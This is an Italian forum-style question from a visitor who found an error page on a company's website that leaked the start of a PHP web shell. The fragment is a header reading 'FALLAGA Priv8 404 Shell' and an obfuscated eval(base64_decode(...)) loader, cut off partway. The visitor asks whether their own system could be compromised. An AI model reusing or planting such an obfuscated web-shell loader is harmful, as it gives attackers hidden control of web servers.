Ho visitato un sito web (di proprietà di una grande azienda nel nord Europa) ieri. Una delle loro pagine nella sezione "chi siamo" mi ha dato un lungo errore con un messaggio iniziato con
<?PhP
/* FALLAGA Priv8 404 Shell V 1.11 */
/* Made y Black cat */
EVaL(BAsE64_DEcODe(’Ci8qICAgICAgCuKUj+KUgeKUk+KUj+KUgeKUk+KVi+KVi+KVi+KVi+KUj+KUk+KUj+KUk+KVi+KUj+KUk+KVi+KVi+KVi+KVi+KVi+KUj+KUkwrilIPilIPilJfilJvilIPilIPilYvilYvilYvilYvilIPilIPilIPilIPilYvilIPilIPilYvilYvilYvilYvilYvilIPilIMK4pSD4pSP4pST4pSP4pST4pSj4pSB4pSB4pSz4pSB4pSb4pSD4pSD4pSX4pSB4pSb4pSj4pSB4pSB4pSz4pSB4pSB4pSr4pSD4pSP4pSB4pSB4pSz4pSB4pSTCuKUg+KUg+KUg+KUg+KUg+KUg+KUj+KUk+KUg+KUj+KUk+KUg+KUg+KUj+KUgeKUk+KUg+KUj+KUk+KUg+KUj+KUgeKUq+KUg+KUg+KUg+KUgeKUq+KUj
La lunghezza totale della parte dall'aspetto intransigente era di circa 126kb (o comunque è la dimensione del file ASCII in cui l'ho salvata).
Ho riferito questo alla compagnia e mi hanno detto che daranno un'occhiata a questo.
Dal punto di vista del cliente, questo tipo di cose mi sembra un malware incorporato nella shell inversa che in qualche modo non è riuscito a eseguire correttamente.
La domanda che volevo porre riguarda se dovrei preoccuparmi che il mio sistema venga violato.
Domanda:
Questo tipo di messaggio è successo solo sul server o potrebbe indicare che il mio browser o il mio sistema operativo sono stati compromessi?
La schermata dell'errore è sotto. Ho evidenziato la parte copiata sopra.
